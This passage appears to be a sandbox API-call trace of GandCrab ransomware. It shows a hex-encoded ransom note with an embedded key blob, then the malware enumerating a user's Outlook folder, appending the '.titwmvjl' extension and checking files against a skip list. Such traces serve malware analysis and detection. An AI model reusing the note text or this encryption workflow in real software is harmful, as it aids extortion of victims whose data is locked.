49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.874] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.875] CloseHandle (hObject=0x2bc) returned 1 [0072.875] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.875] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.875] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0xb8)) [0072.875] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.876] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.876] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.876] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a09d2ca4deb61a.lock") returned 80 [0072.876] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\outlook\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.877] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.878] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.878] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 56 [0072.878] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0072.878] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5034f8 [0072.878] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.878] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.878] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.878] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.878] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.878] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.879] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.879] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a09d2ca4deb61a.lock" [0072.879] lstrlenW (lpString=".titwmvjl") returned 9 [0072.879] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a09d2ca4deb61a.lock") returned 80 [0072.879] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.879] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 89 [0072.879] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\d2ca4a09d2ca4deb61a.lock") returned 80 [0072.879] lstrlenW (lpString=".lock") returned 5 [0072.879] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.879] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.879] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.879] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.879] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.879] lstrcmpW (lpString1="Outlook.srs", lpString2=".") returned 1 [0072.879] lstrcmpW (lpString1="Outlook.srs", lpString2="..") returned 1 [0072.880] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="Outlook.srs" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" [0072.880] lstrlenW (lpString=".titwmvjl") returned 9 [0072.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0072.880] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.880] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.titwmvjl") returned 76 [0072.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0072.880] lstrlenW (lpString=".srs") returned 4 [0072.880] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.880] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".srs ") returned 5 [0072.880] lstrcmpiW (lpString1=".srs", lpString2=".titwmvjl") returned -1 [0072.880] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0072.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="desktop.ini") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="autorun.inf") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="ntuser.dat") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="iconcache.db") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="bootsect.bak") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="boot.ini") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="ntuser.dat.log") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="thumbs.db") returned -1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="KRAB-DECRYPT.html") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="CRAB-DECRYPT.html") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="KRAB-DECRYPT.txt") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="ntldr") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="NTDETECT.COM") returned 1 [0072.881] lstrcmpiW (lpString1="Outlook.srs", lpString2="Bootfont.bin") returned 1 [0072.881] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 67 [0072.881] lstrlenW (lpString=".srs") returned 4 [0072.881] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.881] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".srs ") returned 5 [0072.881] 